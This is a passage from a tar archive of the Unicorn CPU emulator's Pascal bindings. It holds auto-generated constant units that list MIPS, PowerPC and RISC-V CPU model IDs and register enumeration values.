UC_MIPS_REG_AC3 = 48; // COP registers UC_MIPS_REG_CC0 = 49; UC_MIPS_REG_CC1 = 50; UC_MIPS_REG_CC2 = 51; UC_MIPS_REG_CC3 = 52; UC_MIPS_REG_CC4 = 53; UC_MIPS_REG_CC5 = 54; UC_MIPS_REG_CC6 = 55; UC_MIPS_REG_CC7 = 56; // FPU registers UC_MIPS_REG_F0 = 57; UC_MIPS_REG_F1 = 58; UC_MIPS_REG_F2 = 59; UC_MIPS_REG_F3 = 60; UC_MIPS_REG_F4 = 61; UC_MIPS_REG_F5 = 62; UC_MIPS_REG_F6 = 63; UC_MIPS_REG_F7 = 64; UC_MIPS_REG_F8 = 65; UC_MIPS_REG_F9 = 66; UC_MIPS_REG_F10 = 67; UC_MIPS_REG_F11 = 68; UC_MIPS_REG_F12 = 69; UC_MIPS_REG_F13 = 70; UC_MIPS_REG_F14 = 71; UC_MIPS_REG_F15 = 72; UC_MIPS_REG_F16 = 73; UC_MIPS_REG_F17 = 74; UC_MIPS_REG_F18 = 75; UC_MIPS_REG_F19 = 76; UC_MIPS_REG_F20 = 77; UC_MIPS_REG_F21 = 78; UC_MIPS_REG_F22 = 79; UC_MIPS_REG_F23 = 80; UC_MIPS_REG_F24 = 81; UC_MIPS_REG_F25 = 82; UC_MIPS_REG_F26 = 83; UC_MIPS_REG_F27 = 84; UC_MIPS_REG_F28 = 85; UC_MIPS_REG_F29 = 86; UC_MIPS_REG_F30 = 87; UC_MIPS_REG_F31 = 88; UC_MIPS_REG_FCC0 = 89; UC_MIPS_REG_FCC1 = 90; UC_MIPS_REG_FCC2 = 91; UC_MIPS_REG_FCC3 = 92; UC_MIPS_REG_FCC4 = 93; UC_MIPS_REG_FCC5 = 94; UC_MIPS_REG_FCC6 = 95; UC_MIPS_REG_FCC7 = 96; // AFPR128 UC_MIPS_REG_W0 = 97; UC_MIPS_REG_W1 = 98; UC_MIPS_REG_W2 = 99; UC_MIPS_REG_W3 = 100; UC_MIPS_REG_W4 = 101; UC_MIPS_REG_W5 = 102; UC_MIPS_REG_W6 = 103; UC_MIPS_REG_W7 = 104; UC_MIPS_REG_W8 = 105; UC_MIPS_REG_W9 = 106; UC_MIPS_REG_W10 = 107; UC_MIPS_REG_W11 = 108; UC_MIPS_REG_W12 = 109; UC_MIPS_REG_W13 = 110; UC_MIPS_REG_W14 = 111; UC_MIPS_REG_W15 = 112; UC_MIPS_REG_W16 = 113; UC_MIPS_REG_W17 = 114; UC_MIPS_REG_W18 = 115; UC_MIPS_REG_W19 = 116; UC_MIPS_REG_W20 = 117; UC_MIPS_REG_W21 = 118; UC_MIPS_REG_W22 = 119; UC_MIPS_REG_W23 = 120; UC_MIPS_REG_W24 = 121; UC_MIPS_REG_W25 = 122; UC_MIPS_REG_W26 = 123; UC_MIPS_REG_W27 = 124; UC_MIPS_REG_W28 = 125; UC_MIPS_REG_W29 = 126; UC_MIPS_REG_W30 = 127; UC_MIPS_REG_W31 = 128; UC_MIPS_REG_HI = 129; UC_MIPS_REG_LO = 130; UC_MIPS_REG_P0 = 131; UC_MIPS_REG_P1 = 132; UC_MIPS_REG_P2 = 133; UC_MIPS_REG_MPL0 = 134; UC_MIPS_REG_MPL1 = 135; UC_MIPS_REG_MPL2 = 136; UC_MIPS_REG_CP0_CONFIG3 = 137; UC_MIPS_REG_CP0_USERLOCAL = 138; UC_MIPS_REG_CP0_STATUS = 139; UC_MIPS_REG_ENDING = 140; UC_MIPS_REG_ZERO = 2; UC_MIPS_REG_AT = 3; UC_MIPS_REG_V0 = 4; UC_MIPS_REG_V1 = 5; UC_MIPS_REG_A0 = 6; UC_MIPS_REG_A1 = 7; UC_MIPS_REG_A2 = 8; UC_MIPS_REG_A3 = 9; UC_MIPS_REG_T0 = 10; UC_MIPS_REG_T1 = 11; UC_MIPS_REG_T2 = 12; UC_MIPS_REG_T3 = 13; UC_MIPS_REG_T4 = 14; UC_MIPS_REG_T5 = 15; UC_MIPS_REG_T6 = 16; UC_MIPS_REG_T7 = 17; UC_MIPS_REG_S0 = 18; UC_MIPS_REG_S1 = 19; UC_MIPS_REG_S2 = 20; UC_MIPS_REG_S3 = 21; UC_MIPS_REG_S4 = 22; UC_MIPS_REG_S5 = 23; UC_MIPS_REG_S6 = 24; UC_MIPS_REG_S7 = 25; UC_MIPS_REG_T8 = 26; UC_MIPS_REG_T9 = 27; UC_MIPS_REG_K0 = 28; UC_MIPS_REG_K1 = 29; UC_MIPS_REG_GP = 30; UC_MIPS_REG_SP = 31; UC_MIPS_REG_FP = 32; UC_MIPS_REG_S8 = 32; UC_MIPS_REG_RA = 33; UC_MIPS_REG_HI0 = 45; UC_MIPS_REG_HI1 = 46; UC_MIPS_REG_HI2 = 47; UC_MIPS_REG_HI3 = 48; UC_MIPS_REG_LO0 = 45; UC_MIPS_REG_LO1 = 46; UC_MIPS_REG_LO2 = 47; UC_MIPS_REG_LO3 = 48; implementation 
end.�������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/PpcConst.pas��������������������������������������������������0000664�0000000�0000000�00000026657�14675241067�0022177�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit PpcConst; interface const // PPC CPU UC_CPU_PPC32_401 = 0; UC_CPU_PPC32_401A1 = 1; UC_CPU_PPC32_401B2 = 2; UC_CPU_PPC32_401C2 = 3; UC_CPU_PPC32_401D2 = 4; UC_CPU_PPC32_401E2 = 5; UC_CPU_PPC32_401F2 = 6; UC_CPU_PPC32_401G2 = 7; UC_CPU_PPC32_IOP480 = 8; UC_CPU_PPC32_COBRA = 9; UC_CPU_PPC32_403GA = 10; UC_CPU_PPC32_403GB = 11; UC_CPU_PPC32_403GC = 12; UC_CPU_PPC32_403GCX = 13; UC_CPU_PPC32_405D2 = 14; UC_CPU_PPC32_405D4 = 15; UC_CPU_PPC32_405CRA = 16; UC_CPU_PPC32_405CRB = 17; UC_CPU_PPC32_405CRC = 18; UC_CPU_PPC32_405EP = 19; UC_CPU_PPC32_405EZ = 20; UC_CPU_PPC32_405GPA = 21; UC_CPU_PPC32_405GPB = 22; UC_CPU_PPC32_405GPC = 23; UC_CPU_PPC32_405GPD = 24; UC_CPU_PPC32_405GPR = 25; UC_CPU_PPC32_405LP = 26; UC_CPU_PPC32_NPE405H = 27; UC_CPU_PPC32_NPE405H2 = 28; UC_CPU_PPC32_NPE405L = 29; UC_CPU_PPC32_NPE4GS3 = 30; UC_CPU_PPC32_STB03 = 31; UC_CPU_PPC32_STB04 = 32; UC_CPU_PPC32_STB25 = 33; UC_CPU_PPC32_X2VP4 = 34; UC_CPU_PPC32_X2VP20 = 35; UC_CPU_PPC32_440_XILINX = 36; UC_CPU_PPC32_440_XILINX_W_DFPU = 37; UC_CPU_PPC32_440EPA = 38; UC_CPU_PPC32_440EPB = 39; UC_CPU_PPC32_440EPX = 40; UC_CPU_PPC32_460EXB = 41; UC_CPU_PPC32_G2 = 42; UC_CPU_PPC32_G2H4 = 43; UC_CPU_PPC32_G2GP = 44; UC_CPU_PPC32_G2LS = 45; UC_CPU_PPC32_G2HIP3 = 46; UC_CPU_PPC32_G2HIP4 = 47; UC_CPU_PPC32_MPC603 = 48; UC_CPU_PPC32_G2LE = 49; UC_CPU_PPC32_G2LEGP = 50; UC_CPU_PPC32_G2LELS = 51; UC_CPU_PPC32_G2LEGP1 = 52; UC_CPU_PPC32_G2LEGP3 = 53; UC_CPU_PPC32_MPC5200_V10 = 54; UC_CPU_PPC32_MPC5200_V11 = 55; UC_CPU_PPC32_MPC5200_V12 = 56; UC_CPU_PPC32_MPC5200B_V20 = 57; UC_CPU_PPC32_MPC5200B_V21 = 58; UC_CPU_PPC32_E200Z5 = 59; UC_CPU_PPC32_E200Z6 = 60; UC_CPU_PPC32_E300C1 = 61; UC_CPU_PPC32_E300C2 = 62; UC_CPU_PPC32_E300C3 = 63; UC_CPU_PPC32_E300C4 = 64; UC_CPU_PPC32_MPC8343 = 65; UC_CPU_PPC32_MPC8343A = 66; UC_CPU_PPC32_MPC8343E = 67; UC_CPU_PPC32_MPC8343EA = 68; UC_CPU_PPC32_MPC8347T = 69; UC_CPU_PPC32_MPC8347P = 70; UC_CPU_PPC32_MPC8347AT = 71; UC_CPU_PPC32_MPC8347AP = 72; UC_CPU_PPC32_MPC8347ET = 73; UC_CPU_PPC32_MPC8347EP = 74; UC_CPU_PPC32_MPC8347EAT = 75; UC_CPU_PPC32_MPC8347EAP = 76; UC_CPU_PPC32_MPC8349 = 77; UC_CPU_PPC32_MPC8349A = 78; UC_CPU_PPC32_MPC8349E = 79; UC_CPU_PPC32_MPC8349EA = 80; UC_CPU_PPC32_MPC8377 = 81; UC_CPU_PPC32_MPC8377E = 82; UC_CPU_PPC32_MPC8378 = 83; UC_CPU_PPC32_MPC8378E = 84; UC_CPU_PPC32_MPC8379 = 85; UC_CPU_PPC32_MPC8379E = 86; UC_CPU_PPC32_E500_V10 = 87; UC_CPU_PPC32_E500_V20 = 88; UC_CPU_PPC32_E500V2_V10 = 89; UC_CPU_PPC32_E500V2_V20 = 90; UC_CPU_PPC32_E500V2_V21 = 91; UC_CPU_PPC32_E500V2_V22 = 92; UC_CPU_PPC32_E500V2_V30 = 93; UC_CPU_PPC32_E500MC = 94; UC_CPU_PPC32_MPC8533_V10 = 95; UC_CPU_PPC32_MPC8533_V11 = 96; UC_CPU_PPC32_MPC8533E_V10 = 97; UC_CPU_PPC32_MPC8533E_V11 = 98; UC_CPU_PPC32_MPC8540_V10 = 99; UC_CPU_PPC32_MPC8540_V20 = 100; UC_CPU_PPC32_MPC8540_V21 = 101; UC_CPU_PPC32_MPC8541_V10 = 102; UC_CPU_PPC32_MPC8541_V11 = 103; UC_CPU_PPC32_MPC8541E_V10 = 104; 
UC_CPU_PPC32_MPC8541E_V11 = 105; UC_CPU_PPC32_MPC8543_V10 = 106; UC_CPU_PPC32_MPC8543_V11 = 107; UC_CPU_PPC32_MPC8543_V20 = 108; UC_CPU_PPC32_MPC8543_V21 = 109; UC_CPU_PPC32_MPC8543E_V10 = 110; UC_CPU_PPC32_MPC8543E_V11 = 111; UC_CPU_PPC32_MPC8543E_V20 = 112; UC_CPU_PPC32_MPC8543E_V21 = 113; UC_CPU_PPC32_MPC8544_V10 = 114; UC_CPU_PPC32_MPC8544_V11 = 115; UC_CPU_PPC32_MPC8544E_V10 = 116; UC_CPU_PPC32_MPC8544E_V11 = 117; UC_CPU_PPC32_MPC8545_V20 = 118; UC_CPU_PPC32_MPC8545_V21 = 119; UC_CPU_PPC32_MPC8545E_V20 = 120; UC_CPU_PPC32_MPC8545E_V21 = 121; UC_CPU_PPC32_MPC8547E_V20 = 122; UC_CPU_PPC32_MPC8547E_V21 = 123; UC_CPU_PPC32_MPC8548_V10 = 124; UC_CPU_PPC32_MPC8548_V11 = 125; UC_CPU_PPC32_MPC8548_V20 = 126; UC_CPU_PPC32_MPC8548_V21 = 127; UC_CPU_PPC32_MPC8548E_V10 = 128; UC_CPU_PPC32_MPC8548E_V11 = 129; UC_CPU_PPC32_MPC8548E_V20 = 130; UC_CPU_PPC32_MPC8548E_V21 = 131; UC_CPU_PPC32_MPC8555_V10 = 132; UC_CPU_PPC32_MPC8555_V11 = 133; UC_CPU_PPC32_MPC8555E_V10 = 134; UC_CPU_PPC32_MPC8555E_V11 = 135; UC_CPU_PPC32_MPC8560_V10 = 136; UC_CPU_PPC32_MPC8560_V20 = 137; UC_CPU_PPC32_MPC8560_V21 = 138; UC_CPU_PPC32_MPC8567 = 139; UC_CPU_PPC32_MPC8567E = 140; UC_CPU_PPC32_MPC8568 = 141; UC_CPU_PPC32_MPC8568E = 142; UC_CPU_PPC32_MPC8572 = 143; UC_CPU_PPC32_MPC8572E = 144; UC_CPU_PPC32_E600 = 145; UC_CPU_PPC32_MPC8610 = 146; UC_CPU_PPC32_MPC8641 = 147; UC_CPU_PPC32_MPC8641D = 148; UC_CPU_PPC32_601_V0 = 149; UC_CPU_PPC32_601_V1 = 150; UC_CPU_PPC32_601_V2 = 151; UC_CPU_PPC32_602 = 152; UC_CPU_PPC32_603 = 153; UC_CPU_PPC32_603E_V1_1 = 154; UC_CPU_PPC32_603E_V1_2 = 155; UC_CPU_PPC32_603E_V1_3 = 156; UC_CPU_PPC32_603E_V1_4 = 157; UC_CPU_PPC32_603E_V2_2 = 158; UC_CPU_PPC32_603E_V3 = 159; UC_CPU_PPC32_603E_V4 = 160; UC_CPU_PPC32_603E_V4_1 = 161; UC_CPU_PPC32_603E7 = 162; UC_CPU_PPC32_603E7T = 163; UC_CPU_PPC32_603E7V = 164; UC_CPU_PPC32_603E7V1 = 165; UC_CPU_PPC32_603E7V2 = 166; UC_CPU_PPC32_603P = 167; UC_CPU_PPC32_604 = 168; UC_CPU_PPC32_604E_V1_0 = 169; UC_CPU_PPC32_604E_V2_2 = 170; UC_CPU_PPC32_604E_V2_4 = 171; UC_CPU_PPC32_604R = 172; UC_CPU_PPC32_740_V1_0 = 173; UC_CPU_PPC32_750_V1_0 = 174; UC_CPU_PPC32_740_V2_0 = 175; UC_CPU_PPC32_750_V2_0 = 176; UC_CPU_PPC32_740_V2_1 = 177; UC_CPU_PPC32_750_V2_1 = 178; UC_CPU_PPC32_740_V2_2 = 179; UC_CPU_PPC32_750_V2_2 = 180; UC_CPU_PPC32_740_V3_0 = 181; UC_CPU_PPC32_750_V3_0 = 182; UC_CPU_PPC32_740_V3_1 = 183; UC_CPU_PPC32_750_V3_1 = 184; UC_CPU_PPC32_740E = 185; UC_CPU_PPC32_750E = 186; UC_CPU_PPC32_740P = 187; UC_CPU_PPC32_750P = 188; UC_CPU_PPC32_750CL_V1_0 = 189; UC_CPU_PPC32_750CL_V2_0 = 190; UC_CPU_PPC32_750CX_V1_0 = 191; UC_CPU_PPC32_750CX_V2_0 = 192; UC_CPU_PPC32_750CX_V2_1 = 193; UC_CPU_PPC32_750CX_V2_2 = 194; UC_CPU_PPC32_750CXE_V2_1 = 195; UC_CPU_PPC32_750CXE_V2_2 = 196; UC_CPU_PPC32_750CXE_V2_3 = 197; UC_CPU_PPC32_750CXE_V2_4 = 198; UC_CPU_PPC32_750CXE_V2_4B = 199; UC_CPU_PPC32_750CXE_V3_0 = 200; UC_CPU_PPC32_750CXE_V3_1 = 201; UC_CPU_PPC32_750CXE_V3_1B = 202; UC_CPU_PPC32_750CXR = 203; UC_CPU_PPC32_750FL = 204; UC_CPU_PPC32_750FX_V1_0 = 205; UC_CPU_PPC32_750FX_V2_0 = 206; UC_CPU_PPC32_750FX_V2_1 = 207; UC_CPU_PPC32_750FX_V2_2 = 208; UC_CPU_PPC32_750FX_V2_3 = 209; UC_CPU_PPC32_750GL = 210; UC_CPU_PPC32_750GX_V1_0 = 211; UC_CPU_PPC32_750GX_V1_1 = 212; UC_CPU_PPC32_750GX_V1_2 = 213; UC_CPU_PPC32_750L_V2_0 = 214; UC_CPU_PPC32_750L_V2_1 = 215; UC_CPU_PPC32_750L_V2_2 = 216; UC_CPU_PPC32_750L_V3_0 = 217; UC_CPU_PPC32_750L_V3_2 = 218; UC_CPU_PPC32_745_V1_0 = 219; UC_CPU_PPC32_755_V1_0 = 220; UC_CPU_PPC32_745_V1_1 = 221; UC_CPU_PPC32_755_V1_1 = 222; 
UC_CPU_PPC32_745_V2_0 = 223; UC_CPU_PPC32_755_V2_0 = 224; UC_CPU_PPC32_745_V2_1 = 225; UC_CPU_PPC32_755_V2_1 = 226; UC_CPU_PPC32_745_V2_2 = 227; UC_CPU_PPC32_755_V2_2 = 228; UC_CPU_PPC32_745_V2_3 = 229; UC_CPU_PPC32_755_V2_3 = 230; UC_CPU_PPC32_745_V2_4 = 231; UC_CPU_PPC32_755_V2_4 = 232; UC_CPU_PPC32_745_V2_5 = 233; UC_CPU_PPC32_755_V2_5 = 234; UC_CPU_PPC32_745_V2_6 = 235; UC_CPU_PPC32_755_V2_6 = 236; UC_CPU_PPC32_745_V2_7 = 237; UC_CPU_PPC32_755_V2_7 = 238; UC_CPU_PPC32_745_V2_8 = 239; UC_CPU_PPC32_755_V2_8 = 240; UC_CPU_PPC32_7400_V1_0 = 241; UC_CPU_PPC32_7400_V1_1 = 242; UC_CPU_PPC32_7400_V2_0 = 243; UC_CPU_PPC32_7400_V2_1 = 244; UC_CPU_PPC32_7400_V2_2 = 245; UC_CPU_PPC32_7400_V2_6 = 246; UC_CPU_PPC32_7400_V2_7 = 247; UC_CPU_PPC32_7400_V2_8 = 248; UC_CPU_PPC32_7400_V2_9 = 249; UC_CPU_PPC32_7410_V1_0 = 250; UC_CPU_PPC32_7410_V1_1 = 251; UC_CPU_PPC32_7410_V1_2 = 252; UC_CPU_PPC32_7410_V1_3 = 253; UC_CPU_PPC32_7410_V1_4 = 254; UC_CPU_PPC32_7448_V1_0 = 255; UC_CPU_PPC32_7448_V1_1 = 256; UC_CPU_PPC32_7448_V2_0 = 257; UC_CPU_PPC32_7448_V2_1 = 258; UC_CPU_PPC32_7450_V1_0 = 259; UC_CPU_PPC32_7450_V1_1 = 260; UC_CPU_PPC32_7450_V1_2 = 261; UC_CPU_PPC32_7450_V2_0 = 262; UC_CPU_PPC32_7450_V2_1 = 263; UC_CPU_PPC32_7441_V2_1 = 264; UC_CPU_PPC32_7441_V2_3 = 265; UC_CPU_PPC32_7451_V2_3 = 266; UC_CPU_PPC32_7441_V2_10 = 267; UC_CPU_PPC32_7451_V2_10 = 268; UC_CPU_PPC32_7445_V1_0 = 269; UC_CPU_PPC32_7455_V1_0 = 270; UC_CPU_PPC32_7445_V2_1 = 271; UC_CPU_PPC32_7455_V2_1 = 272; UC_CPU_PPC32_7445_V3_2 = 273; UC_CPU_PPC32_7455_V3_2 = 274; UC_CPU_PPC32_7445_V3_3 = 275; UC_CPU_PPC32_7455_V3_3 = 276; UC_CPU_PPC32_7445_V3_4 = 277; UC_CPU_PPC32_7455_V3_4 = 278; UC_CPU_PPC32_7447_V1_0 = 279; UC_CPU_PPC32_7457_V1_0 = 280; UC_CPU_PPC32_7447_V1_1 = 281; UC_CPU_PPC32_7457_V1_1 = 282; UC_CPU_PPC32_7457_V1_2 = 283; UC_CPU_PPC32_7447A_V1_0 = 284; UC_CPU_PPC32_7457A_V1_0 = 285; UC_CPU_PPC32_7447A_V1_1 = 286; UC_CPU_PPC32_7457A_V1_1 = 287; UC_CPU_PPC32_7447A_V1_2 = 288; UC_CPU_PPC32_7457A_V1_2 = 289; UC_CPU_PPC32_ENDING = 290; // PPC64 CPU UC_CPU_PPC64_E5500 = 0; UC_CPU_PPC64_E6500 = 1; UC_CPU_PPC64_970_V2_2 = 2; UC_CPU_PPC64_970FX_V1_0 = 3; UC_CPU_PPC64_970FX_V2_0 = 4; UC_CPU_PPC64_970FX_V2_1 = 5; UC_CPU_PPC64_970FX_V3_0 = 6; UC_CPU_PPC64_970FX_V3_1 = 7; UC_CPU_PPC64_970MP_V1_0 = 8; UC_CPU_PPC64_970MP_V1_1 = 9; UC_CPU_PPC64_POWER5_V2_1 = 10; UC_CPU_PPC64_POWER7_V2_3 = 11; UC_CPU_PPC64_POWER7_V2_1 = 12; UC_CPU_PPC64_POWER8E_V2_1 = 13; UC_CPU_PPC64_POWER8_V2_0 = 14; UC_CPU_PPC64_POWER8NVL_V1_0 = 15; UC_CPU_PPC64_POWER9_V1_0 = 16; UC_CPU_PPC64_POWER9_V2_0 = 17; UC_CPU_PPC64_POWER10_V1_0 = 18; UC_CPU_PPC64_ENDING = 19; // PPC registers UC_PPC_REG_INVALID = 0; // General purpose registers UC_PPC_REG_PC = 1; UC_PPC_REG_0 = 2; UC_PPC_REG_1 = 3; UC_PPC_REG_2 = 4; UC_PPC_REG_3 = 5; UC_PPC_REG_4 = 6; UC_PPC_REG_5 = 7; UC_PPC_REG_6 = 8; UC_PPC_REG_7 = 9; UC_PPC_REG_8 = 10; UC_PPC_REG_9 = 11; UC_PPC_REG_10 = 12; UC_PPC_REG_11 = 13; UC_PPC_REG_12 = 14; UC_PPC_REG_13 = 15; UC_PPC_REG_14 = 16; UC_PPC_REG_15 = 17; UC_PPC_REG_16 = 18; UC_PPC_REG_17 = 19; UC_PPC_REG_18 = 20; UC_PPC_REG_19 = 21; UC_PPC_REG_20 = 22; UC_PPC_REG_21 = 23; UC_PPC_REG_22 = 24; UC_PPC_REG_23 = 25; UC_PPC_REG_24 = 26; UC_PPC_REG_25 = 27; UC_PPC_REG_26 = 28; UC_PPC_REG_27 = 29; UC_PPC_REG_28 = 30; UC_PPC_REG_29 = 31; UC_PPC_REG_30 = 32; UC_PPC_REG_31 = 33; UC_PPC_REG_CR0 = 34; UC_PPC_REG_CR1 = 35; UC_PPC_REG_CR2 = 36; UC_PPC_REG_CR3 = 37; UC_PPC_REG_CR4 = 38; UC_PPC_REG_CR5 = 39; UC_PPC_REG_CR6 = 40; UC_PPC_REG_CR7 = 41; UC_PPC_REG_FPR0 = 42; UC_PPC_REG_FPR1 = 43; 
UC_PPC_REG_FPR2 = 44; UC_PPC_REG_FPR3 = 45; UC_PPC_REG_FPR4 = 46; UC_PPC_REG_FPR5 = 47; UC_PPC_REG_FPR6 = 48; UC_PPC_REG_FPR7 = 49; UC_PPC_REG_FPR8 = 50; UC_PPC_REG_FPR9 = 51; UC_PPC_REG_FPR10 = 52; UC_PPC_REG_FPR11 = 53; UC_PPC_REG_FPR12 = 54; UC_PPC_REG_FPR13 = 55; UC_PPC_REG_FPR14 = 56; UC_PPC_REG_FPR15 = 57; UC_PPC_REG_FPR16 = 58; UC_PPC_REG_FPR17 = 59; UC_PPC_REG_FPR18 = 60; UC_PPC_REG_FPR19 = 61; UC_PPC_REG_FPR20 = 62; UC_PPC_REG_FPR21 = 63; UC_PPC_REG_FPR22 = 64; UC_PPC_REG_FPR23 = 65; UC_PPC_REG_FPR24 = 66; UC_PPC_REG_FPR25 = 67; UC_PPC_REG_FPR26 = 68; UC_PPC_REG_FPR27 = 69; UC_PPC_REG_FPR28 = 70; UC_PPC_REG_FPR29 = 71; UC_PPC_REG_FPR30 = 72; UC_PPC_REG_FPR31 = 73; UC_PPC_REG_LR = 74; UC_PPC_REG_XER = 75; UC_PPC_REG_CTR = 76; UC_PPC_REG_MSR = 77; UC_PPC_REG_FPSCR = 78; UC_PPC_REG_CR = 79; UC_PPC_REG_ENDING = 80; implementation end.���������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/RiscvConst.pas������������������������������������������������0000664�0000000�0000000�00000017177�14675241067�0022540�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT unit RiscvConst; interface const // RISCV32 CPU UC_CPU_RISCV32_ANY = 0; UC_CPU_RISCV32_BASE32 = 1; UC_CPU_RISCV32_SIFIVE_E31 = 2; UC_CPU_RISCV32_SIFIVE_U34 = 3; UC_CPU_RISCV32_ENDING = 4; // RISCV64 CPU UC_CPU_RISCV64_ANY = 0; UC_CPU_RISCV64_BASE64 = 1; UC_CPU_RISCV64_SIFIVE_E51 = 2; UC_CPU_RISCV64_SIFIVE_U54 = 3; UC_CPU_RISCV64_ENDING = 4; // RISCV registers UC_RISCV_REG_INVALID = 0; // General purpose registers UC_RISCV_REG_X0 = 1; UC_RISCV_REG_X1 = 2; UC_RISCV_REG_X2 = 3; UC_RISCV_REG_X3 = 4; UC_RISCV_REG_X4 = 5; UC_RISCV_REG_X5 = 6; UC_RISCV_REG_X6 = 7; UC_RISCV_REG_X7 = 8; UC_RISCV_REG_X8 = 9; UC_RISCV_REG_X9 = 10; UC_RISCV_REG_X10 = 11; UC_RISCV_REG_X11 = 12; UC_RISCV_REG_X12 = 13; UC_RISCV_REG_X13 = 14; UC_RISCV_REG_X14 = 15; UC_RISCV_REG_X15 = 16; UC_RISCV_REG_X16 = 17; UC_RISCV_REG_X17 = 18; UC_RISCV_REG_X18 = 19; UC_RISCV_REG_X19 = 20; UC_RISCV_REG_X20 = 21; UC_RISCV_REG_X21 = 22; UC_RISCV_REG_X22 = 23; UC_RISCV_REG_X23 = 24; UC_RISCV_REG_X24 = 25; UC_RISCV_REG_X25 = 26; UC_RISCV_REG_X26 = 27; UC_RISCV_REG_X27 = 28; UC_RISCV_REG_X28 = 29; UC_RISCV_REG_X29 = 30; UC_RISCV_REG_X30 = 31; UC_RISCV_REG_X31 = 32; // RISCV CSR UC_RISCV_REG_USTATUS = 33; UC_RISCV_REG_UIE = 34; UC_RISCV_REG_UTVEC = 35; UC_RISCV_REG_USCRATCH = 36; UC_RISCV_REG_UEPC = 37; UC_RISCV_REG_UCAUSE = 38; UC_RISCV_REG_UTVAL = 39; UC_RISCV_REG_UIP = 40; UC_RISCV_REG_FFLAGS = 41; UC_RISCV_REG_FRM = 42; UC_RISCV_REG_FCSR = 43; UC_RISCV_REG_CYCLE = 44; UC_RISCV_REG_TIME = 45; UC_RISCV_REG_INSTRET = 46; UC_RISCV_REG_HPMCOUNTER3 = 47; UC_RISCV_REG_HPMCOUNTER4 = 48; UC_RISCV_REG_HPMCOUNTER5 = 49; UC_RISCV_REG_HPMCOUNTER6 = 50; UC_RISCV_REG_HPMCOUNTER7 = 51; UC_RISCV_REG_HPMCOUNTER8 = 52; UC_RISCV_REG_HPMCOUNTER9 = 53; UC_RISCV_REG_HPMCOUNTER10 = 54; UC_RISCV_REG_HPMCOUNTER11 = 55; UC_RISCV_REG_HPMCOUNTER12 = 56; UC_RISCV_REG_HPMCOUNTER13 = 57; UC_RISCV_REG_HPMCOUNTER14 = 58; UC_RISCV_REG_HPMCOUNTER15 = 59; UC_RISCV_REG_HPMCOUNTER16 = 60; UC_RISCV_REG_HPMCOUNTER17 = 61; UC_RISCV_REG_HPMCOUNTER18 = 62; UC_RISCV_REG_HPMCOUNTER19 = 63; 
UC_RISCV_REG_HPMCOUNTER20 = 64; UC_RISCV_REG_HPMCOUNTER21 = 65; UC_RISCV_REG_HPMCOUNTER22 = 66; UC_RISCV_REG_HPMCOUNTER23 = 67; UC_RISCV_REG_HPMCOUNTER24 = 68; UC_RISCV_REG_HPMCOUNTER25 = 69; UC_RISCV_REG_HPMCOUNTER26 = 70; UC_RISCV_REG_HPMCOUNTER27 = 71; UC_RISCV_REG_HPMCOUNTER28 = 72; UC_RISCV_REG_HPMCOUNTER29 = 73; UC_RISCV_REG_HPMCOUNTER30 = 74; UC_RISCV_REG_HPMCOUNTER31 = 75; UC_RISCV_REG_CYCLEH = 76; UC_RISCV_REG_TIMEH = 77; UC_RISCV_REG_INSTRETH = 78; UC_RISCV_REG_HPMCOUNTER3H = 79; UC_RISCV_REG_HPMCOUNTER4H = 80; UC_RISCV_REG_HPMCOUNTER5H = 81; UC_RISCV_REG_HPMCOUNTER6H = 82; UC_RISCV_REG_HPMCOUNTER7H = 83; UC_RISCV_REG_HPMCOUNTER8H = 84; UC_RISCV_REG_HPMCOUNTER9H = 85; UC_RISCV_REG_HPMCOUNTER10H = 86; UC_RISCV_REG_HPMCOUNTER11H = 87; UC_RISCV_REG_HPMCOUNTER12H = 88; UC_RISCV_REG_HPMCOUNTER13H = 89; UC_RISCV_REG_HPMCOUNTER14H = 90; UC_RISCV_REG_HPMCOUNTER15H = 91; UC_RISCV_REG_HPMCOUNTER16H = 92; UC_RISCV_REG_HPMCOUNTER17H = 93; UC_RISCV_REG_HPMCOUNTER18H = 94; UC_RISCV_REG_HPMCOUNTER19H = 95; UC_RISCV_REG_HPMCOUNTER20H = 96; UC_RISCV_REG_HPMCOUNTER21H = 97; UC_RISCV_REG_HPMCOUNTER22H = 98; UC_RISCV_REG_HPMCOUNTER23H = 99; UC_RISCV_REG_HPMCOUNTER24H = 100; UC_RISCV_REG_HPMCOUNTER25H = 101; UC_RISCV_REG_HPMCOUNTER26H = 102; UC_RISCV_REG_HPMCOUNTER27H = 103; UC_RISCV_REG_HPMCOUNTER28H = 104; UC_RISCV_REG_HPMCOUNTER29H = 105; UC_RISCV_REG_HPMCOUNTER30H = 106; UC_RISCV_REG_HPMCOUNTER31H = 107; UC_RISCV_REG_MCYCLE = 108; UC_RISCV_REG_MINSTRET = 109; UC_RISCV_REG_MCYCLEH = 110; UC_RISCV_REG_MINSTRETH = 111; UC_RISCV_REG_MVENDORID = 112; UC_RISCV_REG_MARCHID = 113; UC_RISCV_REG_MIMPID = 114; UC_RISCV_REG_MHARTID = 115; UC_RISCV_REG_MSTATUS = 116; UC_RISCV_REG_MISA = 117; UC_RISCV_REG_MEDELEG = 118; UC_RISCV_REG_MIDELEG = 119; UC_RISCV_REG_MIE = 120; UC_RISCV_REG_MTVEC = 121; UC_RISCV_REG_MCOUNTEREN = 122; UC_RISCV_REG_MSTATUSH = 123; UC_RISCV_REG_MUCOUNTEREN = 124; UC_RISCV_REG_MSCOUNTEREN = 125; UC_RISCV_REG_MHCOUNTEREN = 126; UC_RISCV_REG_MSCRATCH = 127; UC_RISCV_REG_MEPC = 128; UC_RISCV_REG_MCAUSE = 129; UC_RISCV_REG_MTVAL = 130; UC_RISCV_REG_MIP = 131; UC_RISCV_REG_MBADADDR = 132; UC_RISCV_REG_SSTATUS = 133; UC_RISCV_REG_SEDELEG = 134; UC_RISCV_REG_SIDELEG = 135; UC_RISCV_REG_SIE = 136; UC_RISCV_REG_STVEC = 137; UC_RISCV_REG_SCOUNTEREN = 138; UC_RISCV_REG_SSCRATCH = 139; UC_RISCV_REG_SEPC = 140; UC_RISCV_REG_SCAUSE = 141; UC_RISCV_REG_STVAL = 142; UC_RISCV_REG_SIP = 143; 